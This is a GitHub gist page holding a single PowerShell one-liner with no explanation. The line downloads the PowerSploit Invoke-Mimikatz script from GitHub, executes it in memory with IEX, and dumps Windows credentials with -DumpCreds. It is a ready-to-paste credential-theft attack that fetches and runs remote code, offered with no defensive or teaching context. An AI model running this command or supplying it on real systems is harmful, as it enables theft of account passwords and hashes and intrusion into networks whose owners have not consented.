Skip to content

Instantly share code, notes, and snippets.

@frknozr
Created January 19, 2018 07:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save frknozr/8e4412400aeca463f7871966786fc3ef to your computer and use it in GitHub Desktop.
Save frknozr/8e4412400aeca463f7871966786fc3ef to your computer and use it in GitHub Desktop.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment